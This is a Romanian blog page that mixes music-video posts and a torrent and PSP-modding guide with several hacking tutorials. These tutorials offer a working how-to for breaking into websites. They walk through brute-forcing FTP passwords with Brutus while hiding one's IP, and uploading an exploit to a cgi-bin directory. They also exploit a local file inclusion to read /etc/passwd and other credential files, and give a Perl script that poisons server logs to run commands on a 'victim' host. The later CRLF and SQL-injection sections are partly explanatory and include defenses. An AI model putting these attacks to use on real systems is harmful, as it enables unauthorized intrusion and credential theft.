( Simplu, dar greu de aflat! )

joi, 7 iulie 2011

BUG Mafia feat. Loredana - Fara Cuvinte



Piesa "Fara Cuvinte" este extrasa de pe albumul "Inapoi in viitor" pe care baietii urmeaza sa il lanseze in acest an. Single-ul face aluzie la modul in care ii lasa pe baieti rautatea pe care o vad in jur. Ca sa inspire decaderea societatii, si videoclipul s-a filmat printre ruine. Ideea i-a placut Loredanei, care nu este singura surpriza pregatita de mafioti :). Alaturi de Loredana in clip mai apar Dragos Bucur si Mirela Oprisor

Raluka - Out of your business



Materialul a fost realizat in colaborare cu Rappin’ On Production, piesa produsa de Chris Mayer si Connect-R se bucura deja de success la radio si in mod cert se aude deja si pe plaja.

Raluka a realizat pentru Out of you business un videoclip care pune in imagini textul, mai mult sau mai putin fidel

Angelika Vee - Tokyo Love



Videoclipul piesei "Tokyo Love" a fost regizat si produs de Devin Dygert si dupa cum vedeti a fost unul low budget, dar de efect. Toate veniturile incasate de pe urma vanzarii piesei pe internet vor fi donate organizatiei "American Red Cross", pentru ajutorarea copiilor din Japonia afectati de cutremur si tsunami.

Jimmy Dub - Sunglasses



Dupa succesul primului sau single “Monday”, Jimmy Dub a lansat provocarea “put your sunglasses on”. Vara a inceput, iar piesa marca “Rappin on Production” a avut parte de un feedback bun din partea fanilor, astfel incat isi face aparitia si videoclipului piesei “Sunglasses”.

SIGN Vs Dj Andi - You Got Me




Baietii de la SIGN au lansat videoclipul piesei "You Got Me", realizata in colaborare (versus) Dj Andi. Melodia este primul single al baietilor si a fost produsa de George Hora in Studio 66 Timisoara


Maximilian feat. MefX - Sophie



Muzica single-ului "Sophie" a fost realizata de MefX, un artist din Pitesti pe numele sau real Madalin Slaniceanu, textul apartine celor doi, de mix s-a ocupat Grasu XXL la Okapi Sound, iar de master Cristi Dobrica. Videoclipul piesei a fost regizat de Matei Plesa si a avut premiera pe Music Channel in cadrul emisiunii Hip Hop Hour.


Despre Torente si Bitcometul

Bitcometul este un program de freeshare care face posibila
conectarea intre useri pe internet.
(1) Instalati programul.
(2) Cautati pe internet ce doriti sa downloadati, sub urmatorul format.
Denumirea a ceea ce cautati langa care adaugati "torrent".
Exemplu :starwars torrent
(3) Downloadati torrentul(un fisier de cativa mb)
(4) Da-ti click pe fisierul respectiv care este de fapt un alt programel care ii spune
"bitcometului de unde sa downloadeze, iar "bitcometul" va porni automat.
Va va intreba unde vreti sa salvati ce descarcati etc.
(5) Cand a terminat de descarcat, este posibil ca filmul, jocul, sau
programul cautat, sa apara precum mai arhive rar sau zip, deoarece dowloadul
se face de la mai multi useri simultan ,iar ceea ce ati descarcat este "despachetat"
in mai multe bucatele.
(6) "Impachetati" la loc.Da-ti click dreapta pe prima arhiva rar sau zip,
si selectati "extract to", sau folositi winrar si faceti acelasi lucru.
(7) Ceea ce ati extras va fi in format avi, bin, iso, etc. iar de aici cred ca va descurcati.
PS: Unele arhive sunt corupte. Ca sa le reparati folositi winrar-ul.

Cum sa modezi un PSP Phat/Slim&Lite

Modarea unui PSP inseamna instalarea unui firmware (softul PSP-ului) pe PSP astfel incat sa permita rularea de jocuri si a altor aplicatii direct de pe card. Puteti moda orice PSP 1000 (modelul PHAT) si aproape orice PSP 2000 (modelul Slim&Lite). Nu se pot moda momentan PSP 3000 si PSP 2000 cu modelul de placa de baza TA-088v3.

Cerinte:
1. Un PSP deja modat;
2. Un PSP nemodat (d’ohh);
3. Un card de minim 512 MB. Recomand: Sony, SanDisk, Lexxar. Nu recomand fake-uri si no-name-uri. Desi si acestea din urma merg, pot aparea erori;
4. Un cablu miniUSB;
5. Atentie mare.

Glosar:
MMS = card special pregatit pentru modarea unui PSP;
Pandora battery (baterie Pandora) = baterie creata pentru a putea moda un PSP;
5.00 M33-4 = softul PSP-ului;
Modare = am explicat in prima fraza a tutorialului.


Crearea unui MMS:
1. Descarcati “Rain’s Ultra Lite MMS“
2. Descarcati firmware-ul oficial 5.00
3. Introduceti cardul in PSP-ul modat;
4. Conectati PSP-ul modat la PC si intrati in “USB Mode“;
5. Copiati “RainsUltraLiteMMS.exe” si “500.pbp” in acelasi folder;
6. Porniti “Rain’s Ultra Lite MMS“;
7. Bifati “Format Memory Stick“;
8. Apasati pe “Make MMS“.

Crearea unei baterii pandora
1. Descarcati “Hellcat’s Pandora Installer“
2. Conectati PSP-ul modat la PC cu cardul creat mai sus in el;
3. Dezarhivati “pan3xx.rar” si copiati folderul “pan3xx” in folderul “PSP/GAME“;
4. Iesiti din “USB Mode“;
5. Va duceti la “Games“;
6. Rulati “Hellcat’s Pandora Installer“;
7. Va duceti la “Battery options…”
8. Apasati pe “make battery Pandora“;
9. Va aparea un mesaj de genul “battery pandorized“;
10. Apasati pe “back to main menu“;
11. Apasati pe “Quit“.

Modarea PSP-ului
1. Scoateti bateria si cardul din PSP-ul modat;
2. Scoateti bateria si cardul din PSP-ul nemodat;
3. Introduceti cardul din PSP-ul modat in PSP-ul nemodat;
4. Tineti apasat pe butonul din stanga sus al PSP-ului nemodat si inserati bateria din PSP-ul modat;
5. PSP-ul va porni automat;
6. Apasati pe “Install 5.00 M33-4“;
7. Asteptati ca instalarea sa termine;
8. Porniti PSP-ul;
9. Va duceti la “Games“;
10. Rulati “Hellcat’s Pandora Installer“;
11. Va duceti la “Battery options…“;
12. Apasati pe “make battery normal“;
13. Va aparea un mesaj de genul “battery normalized“;
14. Apasati pe “back to main menu“;
15. Apasati pe “Quit“;
16. Va duceti la “Settings” (primul meniu din stanga);
17. Va duceti in jos la “System“;
18. Cautati si apasati pe “Format Memory Stick“.

Gata, acum aveti al 2-lea PSP modat.
Resurse: Il gasiti in acelasi folder :D .

Tehnica Brute Force - Cum sa spargi un site

Se poate afla parola unui server folosind metode mai putin inteligente cum ar fi conectarile repetate.
Pentru acest lucru este necesar un program de brute force cracking.
Cel mai bun program de acest tip este 'Brutus'. In motorul de cautare tastati 'Brutus' sau 'brute force', pe care il gasiti la sectiunea DOWNLOAD.
Dar cel mai bine se intelege privind urmatorul exemplu. Sa presupunem ca serverul www.server.com are client ftp.
Incercam prima data o conexiune: Deschidem Start/Run si tastam:

open ftp.server.home.ro
220
220
220
220
220

connecting to server running WU_FTPD(ftp.debbie.server.com): {introduceti debbbie}
password:********
userid/password incorrect login failed
goodbye

Dupa cum am vazut serverul,chiar daca nu a permis conectarea,a fost destul de amabil incat sa ne ofere doua informatii
de mare inportanta:

username:debbie
tipul de server:WU_FTPD


Ori gasim un exploit pentru wu_ftpd ori incercam un brute force cracking.
Programul Brutus ofera doua posibilitati de a ataca un server:folosind un dictionar de parole sau incercand toate combinatiile posibile.
Din moment ce stiti username-ul inlocuiti fisierul 'users.dat' care este livrat cu Brutus cu un fisier in care puneti
un singur nume si anume 'debbie'.Fisierul astfel creat puteti sa-l denumiti tot 'user.dat'.
Tot ce va ramane de facut dupa ce ati facut setarile este sa asteptati.
Dupa ce epuizati incercarile cu dictionarul,setati optiunea 'brute force' si selectati optiunile dorite.
Ideal ar fi sa stim lungimea parolei sau numarul de caractere din care este alcatuita parola precum si natura acestora.
Initial eu obisnuiesc sa fac urmatoarele setari privind parola:


length min:0
length max 10
custom char :0123456789


In felul acesta incerc intai toate combintiile numerice posibile apoi schimb optiunea cu litere:
custom char:abcderftyijop

Aceasta metoda este absolut sigura dar are doua dezavantaje majore:

1)Timpul mare de asteptare (1 ora-cateva luni Wink depinde de noroc).Pentru cineva care are Net-ul pe Lan nu este o problema(firma sau alta institutie).
2)Ip-ul dvs este inregistrat,asa ca incercati sa folositi un proxy server sau un program
precum 'jammer' care zice-se ca ascunde numarul de telefon.


Voi mai da un exempu de bug in ftp:

open ftp.server.com 220
220
220
...
connecting to........(ftp.server.com):ftp {introduceti un user implicit} password:guest

ftp>dir 'tastati dir sa vedeti la ce directoare aveti acces'
Daca vedeti un director numit cgi-bin,cgi-win sau script atunci servrul este hackerit!!!
Cautati un exploit adecvat pentru sistemul de operare respectiv (stiti cum sa-l aflati) il puneti pe desktop,
apoi dati urmatoarea comanda(pres. ca exploitul se numeste expl.exe):


cd cgi-bin(sau ce director gasiti)
put expl.exe

apoi tastati 'quit' ,deschideti browserul si tastati(pres. ca directorul este cgi-bin):

http://www.server.com/cgi-bin/expl.exe

cum sa exploatati vulnerabilitatea dintr-un site

Mai intai, sa vedem acest mic cod php:


$page = $_GET[page];
include($page);
?>


Acesta este un cod care nu ar trebui folosit niciodata, vulnerabil la LFI, pentru ca variabila $page nu este santinizata.

Ok, acum sa profitam de aceasta vulnerabilitate, folosind urmatorul cod:


site.host/index.php?page=../../../../../../../etc/passwd

In unele cazuri nu mai este nevoie sa punem ../../../../../../.., etc/passwd fiind de ajuns pentru a avea acces unde trebuie

Daca siteul este gazduit Unix, parolele userilor sunt stocate in /etc/passwd (in cazul in care parola nu este shadow, in acest caz ea aflandu-se in /etc/shadow, unde vom putea avea acces doar daca am avea drepturi de root), si codul de mai sus ne arata aceste parole si usernameurile. Acum tot ce mai ai de facut este sa decodezi parola.
O parola criptata(in acest caz, parola este shadowed si se afla in /etc/shadow), ar trebui sa arate cam asa:

username:x:503:100:FullName:/home/username:/bin/sh

In acest caz, parola este shadowed si se afla in /etc/shadow), alt exemplu de parola fiind:

username:!:503:100:FullName:/home/username:/bin/sh

Alte "locuri" unde puteti gasi parolele in afara de /etc/passwd ar cam fi:

/etc/shadow
/etc/group
/etc/master.passwd
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits

In caz ca Browserul va arata la sfarsitul includerii un .php (si automat. /etc/passwd.php nu va mai exista), adaugati la sf includerii , serverul va omite tot ce scrie dupa .
Exemplu de cod:

site.host/index.php?file=../../../../../../../../etc/passwd


Acum vom incerca sa rulam comenzi pe server injectand coduri php in loguri, apoi rulandu-le.
Cateva adrese de loguri:

../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache/error.log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log

Ok, acum sa aruncam o privire asupra logului in care se salveaza paginile care nu exista si urmatorul cod: . Daca scriem in browser:

site.host/

O sa ne arate evident o pagina in care scrie ca acest cod nu exista pe server, deoarece browserul encodeaza automat URL'ul si pagina pe care noi am accesat-o, browserul o traduce in:

site.host/%3C?%20passthru($_GET[cmd])%20?>

Deci va trebui sa facem altceva... Putem utiliza urmatorul script perl:

#!/usr/bin/perl -w
use IO::Socket;
use LWP::UserAgent;
$site="victim.com";
$path="/folder/";
$code="";
$log = "../../../../../../../etc/httpd/logs/error_log";

print "Trying to inject the code";

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die " Connection Failed. ";
print $socket "GET ".$path.$code." HTTP/1.1 ";
print $socket "User-Agent: ".$code." ";
print $socket "Host: ".$site." ";
print $socket "Connection: close ";
close($socket);
print " Code $code sucssefully injected in $log ";

print " Type command to run or exit to end: ";
$cmd = ;

while($cmd !~ "exit") {

$socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$site", PeerPort=>"80") or die " Connection Failed. ";
print $socket "GET ".$path."index.php=".$log."&cmd=$cmd HTTP/1.1 ";
print $socket "Host: ".$site." ";
print $socket "Accept: */* ";
print $socket "Connection: close ";

while ($show = <$socket>)
{
print $show;
}

print "Type command to run or exit to end: ";
$cmd = ;
}

Copy/Paste la chestia asta si salveaz-o ca ex.pl, dar nu uita sa modifici in exploit urmatoarele lucruri:
1) modifica numele siteului
2) modifica numele logului si calea catre el
3) schimba index.php= cu ce doresti tu

Rulati scriptul si el va va intreba ce comenzi sa rulati !!! Va descurcati de aici incolo !!!

Linkuri utile: http://www.milw0rm.com/video/watch.php?id=57

Acesta este un mic tutorial video, incercati sa-l vizionati ca este foarte bun

Ce este CRLF injection?

Termenul crlf vine de la carriage return ( bagaj intoarcere) . acasetea sunt caractere acsii care nu se vad pe ecran sunt folosite in mod viclean
de windos penmtru a indica sfarsitul unei linii. In linux, sfarsitul liniilor este indicat doar de folosirea line feed.
Combinarea lui cr cu lr este folosita de exemplu atunci cand apasam enter pe tastatura. In functie de aplicatia folosita, in mod general instruim
aplicatia sa inceapa o noua linie sau sa trimita o comanda.
Un atac crlf apare atunci cand un hacker injecteaza comanda crlf in system.
Acest tip de atac nu este o gaura a tehnologiei in sistemul de opearare sau in softul serverului, dar depinde in mare masura de felul in care este
dezvoltat siteul. Unii constructori, sunt inconstienti de tipurile de atac de acest fel si lasa porti deschise atunci cand construiesc aplicatii
web, permitandu-le hackerilor sa infiltreze comenzi crlf.

Ce poate face un atacator daca siteul este vulnerabil.

Chiar dak atacatorul gaseste un site deschis infiltratiilor crlf, el este limitat de structura aplicatiei si cat de severa e fisura in system.
La unele tipuri de siteuri, aceasta fisura poate fi letala ptr. securitatea aplicatiei.in alte cazuri, acesta poate fi un mic bug, cu prioritati
minime.totul depinde de felul in care fisura permite userului sa manipuleze aplicatia web.
Exemplu 1 de CRLF Injection atac.
Orice tip de patrundere a userului poate fi o problema de securitate dak nu valida
Here is a sample basic log file:

Date UserName Message
25/07/2005-14:23:47 GoodSurfer I perfectly agree![/list:u]

This log file is perfectly normal, however if a user had to input something like:
I also agree with you..n25/07/2005-15:00:00 AnotherSurfer What are you talking about!?
The log file would then look like this:

Date UserName Message
25/07/2005-14:23:47 GoodSurfer I perfectly agree!
25/07/2005-14:42:19 BadSurfer I also agree with you..
25/07/2005-15:00:00 AnotherSurfer What are you talking about!?[/list:u]

In acest caz, din moment ce scurgerea nu este chiar filtrate de la cr si lf , userul a creat o intrare falsa in fisierul de logare.
Exemplu 2 de CRLF Injection atac
Multe protocoale de retea ( http) folosesc mult combinatii de comenzi carriage return si line feed din moment ce fiecare linie folosita in acest
protocol este separata de crlf. dak un user este capabil sa defineasca un salt http nefiltrat, it poses a risk, din moment ce userul poate fi
din acel moment capabil sa comunice direct cu serverul, facand legatura cu stratul aplicatiei.
.
De exemplu, headerul unui e-mail, news, si http se bazeaza pe structura “ cheie: valoare”,Si fiecare linie este definite printr-o combinatie
crlf la final.Locatia: headerul este folosit in http ptr a face redirectarea catre un alt url si un “set-cookie”:headerul este folosit ptr
cookie.Daca aceste intrari nu sunt validate , caracterele cr si lf pot fi introduce in user imput (intrarea userului) , si astfel scripurile
web pot fi prostite sa faca alte lucruri decat cele pentru care au fost create.
Daca intrarea nu este scanata de cr si lf si scripul contruieste o redirectare cu stringul:
.If the input is not checked for CR and LF and the script constructs a redirect with the string:
Location: $url%0d%0a
Noi putem redirecta spre un site in timp ce setam un cookie , setand $url (ca un singur string) catre:
http://www.i-was-redirected.com/%0d%0aSet-Cookie: Authenticated=yes%0d%0aReferer: www.somesite.com
Daca un atacator poate salva url-ul spre care este redirectat un alt user, inclusive cookie-urile,cu date importante, acest lucru poate deveni
serios.

Cum scanam dupa CRLF Injection
Cel mai bun mod de a scana siteul de vurnelabilitati este sa folosesti un web vulnerability scanner.Acesta verifica vulnerabilitati CRLF si
va vor da totul ptr. a le putea fixa.
Prevenirea atacurilor CRLF.
Cel mai bun mod de a te apara impotriva crlf-ului este sa filtrezi in mod extins orice intrare pe care oi poate face un user.Unul sa “stearga
totul mai putin informatiile bune” si sa filtreze meta caracterele primate prin intrarile userului.Aceasta va asigura ca doar ceea ce e util
va intra pe campul site-ului si si va fi trimis catre server.

Nu am tradus acolo unde pricepea toata lumea... imi pare rau daca nu e pe intelesul tuturor.

Despre tehnica SQL injection

Tehnica SQL injection da posibilitatea unui atacator sa execute comenzi SQL neautorizate porfitand de oportunitati neortodoxe de intrare in aplicatiile
web construind interogari SQL dinamice.
Acesta devine posibil deoarece PHP combina sirurile interogarilor MYSQL pe care le setezi cu variabila inainte pentru ca cineva sa poata adauga o a
doua interogare sau schimba interogarea ta pentru a le oferi informatii sau acces pe care nu ar trebui sa il aiba. Cele mai obisnuite dintre aceste
intrari includ apostrofuri unescaped in declaratiile SQL.

PROBLEMA

Considerati urmatoarea interogare SQL in PHP:
$result=mysql_query('SELECT * FROM users WHERE username="'.$_GET['username'].'"');

Interogarea selecteaza toate randurile din tabelul userilor unde username-ul este acelasi cu cel din sirul de interogari. Daca priviti cu atentie,
veti realiza ca declaratia este vulnerabila la SQL injection - apostroful in $_GET['username'] nu sunt , si prin urmare nu vor fi cuprinse ca parte
din declaratie, ceea ce permite un comportament defectuos.
Ganditi-va ce s-ar intampla daca $_GET['username'] ar fi urmatorul: " OR 1 OR username = " (dublu apostrof, urmat de textualul " OR 1 OR username = "
urmat de un alt dublu apostrof). Cuprins in expresia originala, interogarea devine urmatoarea: SELECT * FROM users WHERE username = "" OR 1 OR
username = "". Altfel, un dublu apostrof va ramane la sfarsitul afirmatiei.

Aceasta selecteaza toate sirurile din tabelul userilor. Desi nu pare periculos, alte coduri infectate pot fi adaugate, mai ales in interogarile
DELETE sau UPDATE care modifica tabelul.
De asemenea, un alt sir de coduri SQL poate fi adaugat la SELECT * FROM `users` WHERE username = '' adaugand un apostrof sau o semicoloana la
sfarsit, astfel sirul devene SELECT * FROM `users` WHERE username = ''; ' care cu usurinta se transforma in SELECT * FROM `users` WHERE
username = ''; DELETE * FROM `forum` WHERE title != ''

SOLUTIA

Niciodata sa nu aveti incredere in informatiile userului, procesati informatia numai dupa validare. De regula, aceasta se face prin pattern
matching. In exemplul urmator, username-ul este restrictionat la caractere alfanumerice plus underscore si cu o lungime cuprinsa intre 8-20
caractere – modificati la nevoie.

if (preg_match("/^w{8,20}$/", $_GET['username'], $matches))
$result = mysql_query("SELECT * FROM users WHERE username=$matches[0]");
else // we don't bother querying the database
echo "username not accepted";

O buna practica in codare afirma ca apostrofurile duble ar trebuie folosite mereu in oricarei informatii variabile. Ori folosing slash dublu
apostrof , ori apostrof simplu, cadrand intreaga interogatie, pentru ca tipul opus de interogatie sa nu trebuiasca escaped, desi acelasi tip
de apostrof trebuie escaped.
$result = mysql_query('SELECT * FROM users WHERE username = "$usern"');

or

$result = mysql_query("SELECT * FROM users WHERE username = "$usern" ");

Pentru o siguranta mai mare, renuntati la executarea scriptului inlocuind echo cu exit() or die().
Aceasta inca se mai aplica atunci cand se folosesc checkboxuri, butoane ratio, liste de selectie, etc. Orice browser cerut (chiar si POST)
poate fi REPLICATED prin telnet, situri duplicate, javascript, sau codare(chiar si PHP), asadar intotdeauna trebuie sa fiti prevazatori
in privinta restrictiilor pentru codarea aferenta clientului.

Folosirea mysql_real_escape_string()

PHP ofera o functie care se ocupa cu inserarea userului in MySQL, si aceea este mysql_real_escape_string(string unescaped_string[, resource
link_identifier]). Acest script scapa de toate caracterele potential periculoase din sir si transforma sirul escaped intr-unul prudent
pentru a fi folosit in sirul MySQL.
(Functia originala, myqsl_escape_string, nu a luat in considerare caracterul curent pentru a iesi din sir, nici nu a acceptat argumentul
conexiunii. Este dezaprobata inca de la PHP 4.3.0) Spre exemplu, luati urmatorul exemplu:

$result=mysql_query('SELECT * FROM users WHERE username="'.$_GET['username'].'"');

Aceasta poate fi escaped dupa cum urmeaza:

$result=mysql_query('SELECT * FROM users WHERE username="'.mysql_real_escape_string($_GET['username']).'"');

Astfel, daca userul a incercat sa insereze o alta declaratie in afara de DELETE, ar fi interpretat inofensiv ca o parte din parametrul clauza WHERE:

SELECT * FROM `users` WHERE username = '';DELETE * FROM `forum` WHERE title != ''

Backslashurile adaugate de mysql_real_escape_string face ca MySQL sa le interpreteze ai degraba ca si caractere cu un singur apostrof
decat ca si parte din declaratia SQL.
Luati la cunostinta cu MySQL nu permite multe interogari asadar DELETE FROM din tabel nu merge oricum.
Autor madaeroblade

marți, 5 iulie 2011

Anunturi Online - LaVedere.com

Vrei să-ţi vinzi maşina, casa, telefonul, soacra sau orice altceva şi nu găseşti cumpărător?


Nimic mai simplu. Platforma de Anunţuri OnLine a portalului LaVedere.com este acum deschisă pentru oricine. Cu un cont care se creează gratuit in mai puţin de 10 secunde, poţi adăuga orice fel de anunţ, ce va fi valabil pe site timp de 90 de zile, fără să plăteşti nimic!


Incearcă acum!


www.Anunturi.LaVedere.com